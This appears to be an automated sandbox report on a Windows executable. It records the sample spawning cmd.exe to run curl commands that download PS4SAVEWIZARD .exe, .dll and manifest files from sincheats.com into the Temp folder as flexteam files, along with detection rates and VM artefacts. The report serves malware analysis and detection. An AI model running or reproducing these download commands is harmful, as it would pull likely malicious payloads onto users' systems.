Source: Process started | Author: James Pemberton / @4A616D6573: Data: Command: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, CommandLine: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\j82lgS5kgk.exe" , ParentImage: C:\Users\user\Desktop\j82lgS5kgk.exe, ParentProcessId: 7104, ProcessCommandLine: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, ProcessId: 7132 |
Source: j82lgS5kgk.exe | Virustotal: Detection: 13% | Perma Link |
Source: j82lgS5kgk.exe | ReversingLabs: Detection: 16% |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll | Jump to behavior |
Source: j82lgS5kgk.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: \??\C:\Users\user\Desktop\j82lgS5kgk.PDB source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: C:\Windows\symbols\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbj3 source: j82lgS5kgk.exe |
Source: | Binary string: Fo9.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdb source: j82lgS5kgk.exe |
Source: | Binary string: C:\Users\user\Desktop\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbBB source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: C:\Windows\WindowsFormsApp9.pdb\Pro source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: \??\C:\Windows\exe\WindowsFormsApp9.pdbe1 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb813 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: C:\Windows\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: ws\WindowsFormsApp9.pdbpdbpp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbSystem source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762 |
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443 |
Source: dw20.exe, 00000010.00000003.681799621.00000000005F6000.00000004.00000001.sdmp, dw20.exe, 00000010.00000002.684227164.00000000005F6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: Amcache.hve.16.dr | String found in binary or memory: http://upx.sf.net |
Source: curl.exe, 00000009.00000002.660572235.0000024B80CC0000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll |
Source: cmd.exe, 00000007.00000002.661556157.000001DCDAA60000.00000004.00000040.sdmp, curl.exe, 00000009.00000002.660572235.0000024B80CC0000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll-oC: |
Source: curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll3 |
Source: j82lgS5kgk.exe | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dllWhttps://sincheats.com/gas/PS4SAVEWIZARD.exe |
Source: curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dllurlrc |
Source: curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe |
Source: cmd.exe, 0000000C.00000002.671799816.000001A5F02C0000.00000004.00000040.sdmp, curl.exe, 0000000F.00000002.670533583.00000173F3420000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe-oC: |
Source: curl.exe, 00000005.00000002.655444485.0000019DEBA60000.00000004.00000020.sdmp, curl.exe, 00000005.00000002.655463286.0000019DEBA72000.00000004.00000001.sdmp, curl.exe, 00000005.00000003.655221999.0000019DEBA70000.00000004.00000001.sdmp, j82lgS5kgk.exe | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest |
Source: cmd.exe, 00000001.00000002.656320836.00000254AB400000.00000004.00000040.sdmp, curl.exe, 00000005.00000002.655444485.0000019DEBA60000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest-oC: |
Source: curl.exe, 0000000F.00000003.670298105.00000173F342F000.00000004.00000001.sdmp, curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exeKH |
Source: unknown | DNS traffic detected: queries for: sincheats.com |
Source: j82lgS5kgk.exe | Binary or memory string: OriginalFilename vs j82lgS5kgk.exe |
Source: j82lgS5kgk.exe, 00000000.00000002.683951517.00000000001F2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameWindowsFormsApp9.exeB vs j82lgS5kgk.exe |
Source: j82lgS5kgk.exe, 00000000.00000002.684043836.00000000005EB000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs j82lgS5kgk.exe |
Source: j82lgS5kgk.exe | Binary or memory string: OriginalFilenameWindowsFormsApp9.exeB vs j82lgS5kgk.exe |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824 |
Source: j82lgS5kgk.exe | Virustotal: Detection: 13% |
Source: j82lgS5kgk.exe | ReversingLabs: Detection: 16% |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File read: C:\Users\user\Desktop\j82lgS5kgk.exe | Jump to behavior |
Source: j82lgS5kgk.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp | Jump to behavior |
Source: unknown | Process created: C:\Users\user\Desktop\j82lgS5kgk.exe "C:\Users\user\Desktop\j82lgS5kgk.exe" | |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest" | |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll" | |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe" | |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824 | |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe" | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_01 |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF404.tmp | Jump to behavior |
Source: classification engine | Classification label: mal48.winEXE@18/7@3/1 |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll | Jump to behavior |
Source: j82lgS5kgk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll | Jump to behavior |
Source: j82lgS5kgk.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: j82lgS5kgk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: | Binary string: \??\C:\Users\user\Desktop\j82lgS5kgk.PDB source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: C:\Windows\symbols\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbj3 source: j82lgS5kgk.exe |
Source: | Binary string: Fo9.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdb source: j82lgS5kgk.exe |
Source: | Binary string: C:\Users\user\Desktop\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbBB source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: C:\Windows\WindowsFormsApp9.pdb\Pro source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: \??\C:\Windows\exe\WindowsFormsApp9.pdbe1 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb813 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: C:\Windows\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp |
Source: | Binary string: ws\WindowsFormsApp9.pdbpdbpp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: | Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbSystem source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp |
Source: j82lgS5kgk.exe | Static PE information: 0xDDC5B4B8 [Wed Nov 26 21:46:32 2087 UTC] |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: Amcache.hve.16.dr | Binary or memory string: VMware |
Source: Amcache.hve.16.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000 |
Source: Amcache.hve.16.dr | Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000 |
Source: Amcache.hve.16.dr | Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.16.dr | Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed |
Source: Amcache.hve.16.dr | Binary or memory string: VMware, Inc. |
Source: dw20.exe, 00000010.00000002.684129056.0000000000581000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWp |
Source: Amcache.hve.16.dr | Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin |
Source: Amcache.hve.16.dr | Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.16.dr | Binary or memory string: VMware7,1 |
Source: Amcache.hve.16.dr | Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.16.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: Amcache.hve.16.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: dw20.exe, 00000010.00000002.684213809.00000000005E7000.00000004.00000020.sdmp, dw20.exe, 00000010.00000003.681586303.00000000005E7000.00000004.00000001.sdmp, dw20.exe, 00000010.00000003.681998985.00000000005E7000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.16.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.16.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.16.dr | Binary or memory string: VMware, Inc.me |
Source: Amcache.hve.16.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000 |
Source: curl.exe, 00000005.00000002.655463286.0000019DEBA72000.00000004.00000001.sdmp, curl.exe, 00000005.00000003.655221999.0000019DEBA70000.00000004.00000001.sdmp, curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmp, curl.exe, 0000000F.00000003.670298105.00000173F342F000.00000004.00000001.sdmp, curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: Amcache.hve.16.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000 |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process queried: DebugPort | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Memory allocated: page read and write | page guard | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe | Jump to behavior |
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe" | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |
Source: Amcache.hve.16.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.